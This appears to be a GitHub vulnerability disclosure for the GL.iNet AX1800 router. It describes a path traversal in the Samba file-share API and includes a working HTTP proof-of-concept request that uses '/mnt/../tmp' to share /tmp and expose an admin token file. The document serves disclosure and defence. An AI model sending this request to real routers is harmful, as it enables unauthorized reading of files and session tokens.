Skip to content

Latest commit

 

History

History
25 lines (15 loc) · 1.11 KB

Arbitrary File Read through file share.md

File metadata and controls

25 lines (15 loc) · 1.11 KB

Affected Product

glinet AX1800

Path Traversal

Through the file sharing feature, it is possible to share and arbitrary directory. It is possible to bypass the current check that verifies whether the starting directory is /mnt/ by using the ../, so by specifying /mnt/../tmp as the directory, it is still possible to share the /tmp directory.

We prepared also a video PoC:

Proof of Concept:

Request

POST /cgi-bin/api/files/samba/set HTTP/1.1Host: 192.168.8.1Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestAuthorization: 592e4f05283346008452c8c8ca8edf95User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36Referer: <http://192.168.8.1/Accept-Encoding:> gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: Admin-Token=592e4f05283346008452c8c8ca8edf95Connection: closeContent-Length: 62
path=/mnt/../tmp&lan_share=true&wan_share=falase&writable=true**
**

On the shell

//192.168.8.1/GL-Samba
 gl_token_592e4f05283346008452c8c8ca8edf95   N   2972  Jul 29 08:43 2023